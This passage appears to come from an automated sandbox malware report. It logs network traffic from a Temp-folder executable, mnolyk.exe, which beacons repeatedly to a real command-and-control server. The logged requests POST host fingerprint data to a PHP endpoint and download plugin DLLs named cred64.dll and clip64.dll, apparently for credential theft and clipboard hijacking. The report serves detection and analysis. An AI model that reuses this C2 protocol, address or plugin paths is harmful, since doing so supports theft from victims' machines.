                            Feb 8, 2023 17:40:10.513992071 CET805029462.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:10.514164925 CET5029480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.514631033 CET805029562.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:10.514821053 CET5029580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.522022009 CET5029580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.583743095 CET805029562.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:10.586210966 CET805029562.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:10.586361885 CET5029580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.701303959 CET5029580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.702097893 CET5029680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.763036966 CET805029562.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:10.763119936 CET5029580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.763371944 CET805029662.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:10.763453960 CET5029680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.763881922 CET5029680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.825186014 CET805029662.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:10.827420950 CET805029662.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:10.827548027 CET5029680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.940159082 CET5029680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.941010952 CET5029780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.001738071 CET805029662.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.001808882 CET5029680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.003328085 CET805029762.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.003442049 CET5029780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.003849983 CET5029780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.066051960 CET805029762.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.070122004 CET805029762.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.070265055 CET5029780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.195661068 CET5029780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.196712017 CET5029880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.257930994 CET805029762.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.257994890 CET5029780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.259157896 CET805029862.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.259273052 CET5029880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.262830019 CET5029880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.325256109 CET805029862.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.327487946 CET805029862.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.327567101 CET5029880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.438276052 CET5029880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.439131975 CET5029980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.499619961 CET805029962.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.499737978 CET5029980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.500143051 CET5029980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.500714064 CET805029862.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.500786066 CET5029880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.560592890 CET805029962.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.562865973 CET805029962.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.562962055 CET5029980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.670320034 CET5029980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.671256065 CET5030080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.731087923 CET805029962.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.731179953 CET5029980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.732671976 CET805030062.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.732783079 CET5030080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.733230114 CET5030080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.795970917 CET805030062.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.798274994 CET805030062.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.798387051 CET5030080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.920666933 CET5030080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.921578884 CET5030180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.983129978 CET805030062.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.983269930 CET5030080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.984432936 CET805030162.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.984620094 CET5030180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.986985922 CET5030180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.049240112 CET805030162.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:12.053431988 CET805030162.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:12.053560972 CET5030180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.174083948 CET5030180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.175007105 CET5030280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.238459110 CET805030262.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:12.238492012 CET805030162.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:12.238580942 CET5030280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.238630056 CET5030180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.239778042 CET5030280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.301055908 CET805030262.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:12.303134918 CET805030262.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:12.303232908 CET5030280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.421221018 CET5030280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.422103882 CET5030380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.482722044 CET805030362.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:12.482954979 CET805030262.204.41.4192.168.2.4
                            • 62.204.41.4
                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            0 | 192.168.2.4 | 49695 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:24.659550905 CET | 92 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:24.723897934 CET | 93 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:24 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            1 | 192.168.2.4 | 49696 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:24.664385080 CET | 93 | OUT | GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1
                            Host: 62.204.41.4
                            Feb 8, 2023 17:37:24.726803064 CET | 93 | IN | HTTP/1.1 404 Not Found
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:24 GMT
                            Content-Type: text/html
                            Content-Length: 162
                            Connection: keep-alive
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                            Feb 8, 2023 17:37:24.754415035 CET | 94 | OUT | GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1
                            Host: 62.204.41.4
                            Feb 8, 2023 17:37:24.817105055 CET | 95 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:24 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 91136
                            Last-Modified: Fri, 03 Feb 2023 17:19:21 GMT
                            Connection: keep-alive
                            ETag: "63dd4219-16400"
                            Accept-Ranges: bytes


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            10 | 192.168.2.4 | 49705 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:26.868385077 CET | 199 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:26.931653023 CET | 199 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:26 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            100 | 192.168.2.4 | 49795 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:51.324908972 CET | 288 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:51.388962984 CET | 289 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:51 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            101 | 192.168.2.4 | 49796 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:52.334939957 CET | 289 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:52.402563095 CET | 290 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:52 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            102 | 192.168.2.4 | 49797 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:52.616336107 CET | 290 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:52.681121111 CET | 291 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:52 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            103 | 192.168.2.4 | 49798 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:52.895060062 CET | 291 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:52.960750103 CET | 292 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:52 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            104 | 192.168.2.4 | 49799 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:53.714298010 CET | 292 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:53.781994104 CET | 293 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:53 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            105 | 192.168.2.4 | 49800 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:54.558247089 CET | 293 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:54.624588966 CET | 294 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:54 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            106 | 192.168.2.4 | 49801 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:54.834263086 CET | 294 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:54.899101019 CET | 295 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:54 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            107 | 192.168.2.4 | 49802 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:55.075474024 CET | 295 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:55.142520905 CET | 296 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:55 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            108 | 192.168.2.4 | 49803 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:55.306674004 CET | 296 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:55.370026112 CET | 297 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:55 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            109 | 192.168.2.4 | 49804 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:55.542967081 CET | 297 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:55.606290102 CET | 298 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:55 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            11 | 192.168.2.4 | 49706 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:27.103523970 CET | 200 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:27.168011904 CET | 200 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:27 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            110 | 192.168.2.4 | 49805 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:55.775944948 CET | 298 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:55.838260889 CET | 299 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:55 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            111 | 192.168.2.4 | 49806 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
